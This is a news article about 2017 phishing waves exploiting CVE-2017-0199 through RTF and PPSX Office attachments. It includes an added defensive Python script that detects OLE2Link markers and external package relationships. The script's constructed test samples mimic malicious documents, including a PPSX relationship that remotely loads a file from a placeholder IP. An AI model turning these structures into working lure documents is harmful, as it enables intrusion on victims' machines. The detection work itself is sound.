Attackers experimenting with CVE-2017-0199 in recent phishing attacks
- 16 August, 2017 09:55
Researchers at Trend Micro and Cisco's Talos have identified a new wave of phishing attacks leveraging CVE-2017-0199, a previously patched remote code execution vulnerability in the OLE (Windows Object Linking and Embedding) interface of Microsoft Office.
These latest attacks have paired the vulnerability with others in an attempt to bypass warning messages, but the results were less than stellar.
In a blog post, Talos researchers said the attacks they've observed used CVE-2017-0199 with an older exploit – CVE-2012-0158 – in an attempt to bypass warning messages displayed by Microsoft Word. However, they believe the attacks were a test-run of sorts, because the attackers made several mistakes that limited their overall effectiveness.
"Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor. Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents," the Talos post explained.
The attacks start via email with an attached malicious RTF document. Due to the vulnerability in the process that handles OLE2Link code, the RTF document will trigger a remote download via Word, eventually resulting in malware on the system.
But the attackers failed to test their code, as the two vulnerabilities they attempted to chain together didn't work. The warning prompts within Word were still displayed as expected. But why attempt to use two vulnerabilities at all? If the system was vulnerable to CVE-2012-0158, that would make things simpler for the attacker.
"An assumption we can make is that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file," the post says.
A full technical review is available on the Talos blog.
The same day that Talos published its findings, researchers at Trend Micro did the same. In their case, however, the attackers were using PPSX attachments (PowerPoint Slideshow files), confirming the Talos observation that attackers would eventually start testing additional Office formats.
The PPSX file discovered by Trend researchers also leveraged CVE-2017-0199. The email itself appeared to target companies involved in electronics manufacturing. The researchers who investigated the message believe that the 'From' field was spoofed to mimic a legitimate email from a known business partner, but the findings aren't conclusive.
When the victim opens the PPSX file, instead of the promised business documents, the screen will display a page with nothing other than 'CVE-2017-8570' written on it, which is an entirely different Microsoft Office vulnerability. This random display led Trend researchers to speculate that this is a leftover mistake from the toolkit developer, one the attackers never bothered to address.
"Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focus on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection," the Trend blog explains.
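The two vectors described above (the RTF document carrying an OLE2Link object that triggers a remote download, and the PPSX package that moves the same trick into a different Office format) can both be triaged statically before a file ever reaches Word or PowerPoint. The following added example is not code from the article or from Talos or Trend Micro; it is a small Python triage script that checks an attachment for the RTF-side indicators (the `\objautlink`/`\objupdate` control words and the OLE2Link class ID bytes in the hex-encoded object data) and, for OOXML packages such as PPSX, for relationship entries marked `TargetMode="External"` that point at a remote URL or script moniker. The sample RTF and PPSX inputs, the `203.0.113.10` address and the `logo.doc` name are constructed placeholders, and the external-relationship check is a general heuristic rather than a reproduction of the vendors' specific detection rules.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OLE2Link class ID {00000300-0000-0000-C000-000000000046} as it appears,
# little-endian and hex-encoded, inside an RTF \objdata stream.
OLE2LINK_CLSID_HEX = b"0003000000000000c000000000000046"
OLE2LINK_NAME_HEX = b"4f4c45324c696e6b"  # ASCII "OLE2Link"

# Target schemes that mean an OOXML relationship reaches outside the package.
RISKY_SCHEMES = ("http://", "https://", "script:", "mhtml:", "file://")
PKG_RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def rtf_indicators(data: bytes) -> list:
    """Return the CVE-2017-0199-style indicators found in an RTF byte string."""
    found = []
    if not data.lstrip().startswith(b"{\\rtf"):
        return found
    if re.search(rb"\\objautlink", data):
        found.append("objautlink")
    if re.search(rb"\\objupdate", data):          # object is refreshed on open
        found.append("objupdate")
    # RTF writers may wrap the hex object data across lines; drop whitespace first.
    hex_blob = re.sub(rb"\s+", b"", data).lower()
    if OLE2LINK_CLSID_HEX in hex_blob:
        found.append("ole2link-clsid")
    if OLE2LINK_NAME_HEX in hex_blob:
        found.append("ole2link-name")
    return found


def ooxml_external_targets(data: bytes) -> list:
    """Return (part name, target) pairs for relationships that point outside the package."""
    hits = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return hits
    with zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue
            for rel in root.iter(PKG_RELS_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if target.lower().startswith(RISKY_SCHEMES):
                    hits.append((name, target))
    return hits


def classify(data: bytes) -> dict:
    """Triage one attachment: which vector it matches and which indicators fired."""
    rtf = rtf_indicators(data)
    if rtf:
        return {"vector": "rtf", "indicators": rtf,
                "suspicious": "ole2link-clsid" in rtf}
    ext = ooxml_external_targets(data)
    if ext:
        return {"vector": "ooxml", "indicators": [t for _, t in ext], "suspicious": True}
    return {"vector": "unknown", "indicators": [], "suspicious": False}


# Constructed RTF sample: an auto-updating link object whose object data carries the
# OLE2Link class name and class ID. Not a real malicious document.
SAMPLE_RTF = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}"
    b"{\\*\\objdata 01050000020000000b0000004f4c45324c696e6b0000000000000000\n"
    b"0003000000000000c000000000000046}}}"
)


def build_sample_ppsx() -> bytes:
    """Constructed minimal PowerPoint Show package with one remote slide relationship."""
    rels = (
        b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
        b'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://203.0.113.10/logo.doc" TargetMode="External"/>'
        b"</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("rtf", SAMPLE_RTF), ("ppsx", build_sample_ppsx()), ("text", b"hello")):
        print(label, classify(blob))
```

The external-relationship check deliberately ignores the relative `slideLayout` target, which is how every normal slide references its layout, and only reports targets that leave the package. Run against a mail-gateway quarantine folder, the same two functions give a quick first-pass answer to the question the Trend quote raises: whether a rule tuned for the RTF vector also sees the PPSX one.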
Users who patched their systems with April's updates would be protected from these recent attacks. However, users should remain cautious when opening files or following links, even if they come from a source that looks legitimate on the surface.
A full technical analysis of the PPSX attacks is available on the Trend Micro blog.